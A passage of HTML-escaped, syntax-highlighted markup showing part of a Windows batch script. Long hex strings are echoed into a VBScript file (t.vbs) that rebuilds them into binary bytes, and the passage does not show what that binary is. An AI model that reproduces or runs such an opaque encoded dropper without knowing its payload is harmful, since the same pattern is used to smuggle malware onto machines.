normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5F06E2F9FF3D883FFE52107202A60E3AB310E3F6AC045793EFBD40355A1F283E6B6099"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D1CB803BE6E1730B1937A8B9E29CE7ABDC3A0F99A768EE4285F05EFC8739257ADE3417"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"05425034BF0795065FCB3D94CD6F6328C1A40DD73E3F4F0C3314CD7FC467212126FF30"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"43D1E2F63D2B61F3B846A5E756AB92575FC21DCE9601372B6336B8AA65C4552DA71DF9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4A586446C3B0C0FCE557344A7809224C3DBF17D6A52713541C7FFA07E83F58C0E5CB34"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"834E4593804FCD1A6E6C956781C99AD6D2D62ACDD2B3D3F9630382E0CE97E3BEBE7B8B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CCB50588A400494869CD0709ED4160DDA05DE52683D020E717C0C09E69AEC608093B09"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FB835E85DA63F154B142A4748D2677F5468DF8F7B0BC440DF0563F3E1E69EC7FD60D71"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7A9BA6D3ADE3DDBADEEA6715CD0750A91AF8D93F205F14CDAFE2BE4F631FA12116DBC7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4FA0F56C702BEE74F701A15C422077910972091236A6DAA521CC74C5EE603DEE7CFBAC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AF2C3FBF1A2DC6D76E9687D6D83680CDC19F00EE2234AE863649A37A84B91A7B093BC1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CDF67AA42E732FC9CF179BB1274123C37D69B52B9AA84BF98648448AE719B017D90081"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"37F0137153FA8027888680105F9497A9DE5FCBC7F44284317A05AA06D4ACFC3A066E3D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"18757622C837FF8FEF4553B0CA649534B523FF8C56620DE2E7E330A8756E69D529D1CD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"065FE114B04A8B2E0D730C16C34CFFC5E0E7705F80189237F155DFA3762DBD26EA9163"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D433F35AACE87C7A26E29279FD3BBA64BE355A7D017FE21C946C0DAB74660DD795CCC1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"471FCC64AE5819FF012E95F97174A98C022EF307FE9FC0EAB7F0F405CC357000A45BCA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"EBF0D1022C42662D465C721AE074D18D7576BE08463B3584107699C1806AD4E0DD3B23"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"61BE20173048E21A875A97099A7D8E170CF8E46F18C3BFDD4217CDF4EBE0E399AD2E1D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"62E4C3B12F10C6BFB712E64763B1D14F06E562EC6834417345F376A0173EEDE3575C10"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C5F91E24E0C6F362611B16EEF4166640C14F039D8945B3E2AF7E481C1254D17C0128A4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"3A9413FF21D0B4F366AFFAF9CC5FFDA86F19513FEB866BE7C651265D5434EF1A4FFDFC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8178517DFE7BA439E88C023FA56111954685E600551A45FC1F2F50A5A139E0290445B5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E382F878C9CD0E32AB00B4BB4C667497C9F9372F8F5253217328C55DB8A3C74780DAF1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CCA54AA679804AD40C503FEA32882A68740D6AA50DBA730D72CD453F0F7C19C86F1EA7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C5A05B38E18E42B6C344AAA0F85969FF9A35C209575A0C330D5937D1807B1A9D7D5461"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"047DA6EB1F2FEC3C79FE9A801A89B010D4DC679D62738CC1B3C7ECB494A026539D72B5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5D750DC688CCBEFF05093E5F91299AF1D907FF48AFC8577CF0CEDFD73B2E932FC78C65"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F28C9BAF65F2C5D9E3317965DC784CCEBDF9973179FF77BF84C9AFF7F933F9A5BEF199"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7CE2D22826C7C4FA317951FF30939FEC1F9FC9A72E5DCB643B30D9620D3418F93D2002"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"70992CEA9C421FE361A1BBA340AB2FA0FCA7FB1E93C4A0C322CE1642402A09534724E1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"03BAD25829D73EFEFEC3354FA4C7E5F2B33E2E3F8E8C7DE59B71191B3D7B2C6397CCBE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"96B137448FC7D87B6E1E8FB1D6D9BF8CB13DDFFE12C6769DF767ECD1F3E333F6EA0FA3"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"185B14E3C758E38561C6B65F189FB10103D732763330D64E197BF61265ACFA5BDAB94A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5DAA648391A1CC1A1F8FBD31B5778D8FC36391C3F34638DC4B97193B0D2DE6F5593CE6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"DC84575F2B9AFF4C9F8FCA15CD4F89C494F38FF72231AD125787D46430F0BB7F10CF0B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E0FEEDF04E39467930A97B28F5EFC40E7DD0A15D0A8493F02DDE1E43CC07006FEF10E0"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8D366890BFF3223E4655829D0E463BEDC980DEB87531C497F8EE6CFE0A9D0B25DA1FE8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"50068B4F7508A5059F5AFEC2D9D1231518C89ED25C3475E80641651045F34289779E71"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"689D8CFC6B1ED1C8BA1BFBD910AEBD87568B27243EBC48B9F30DFFCFAF453997A29C07"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7805A2EE46904988BCDDA57DFECF0EBA869F1DE0B36901823EDE12855BF172E71C8E95"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C7F7E51B0DFC8DB3A0A69D891CE9F6674AC89EC7F12269BD3D2BC0009E0EE197602C3E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A81AD05C658EA9D97E373BD490F36B70AC20606C951682D3A8D80DCDF454282F8A9218"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"52DD2175C6917C70D6AA3952ED963AF33517993001FDCF218DAEDFDE56ED8A75422FD1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; 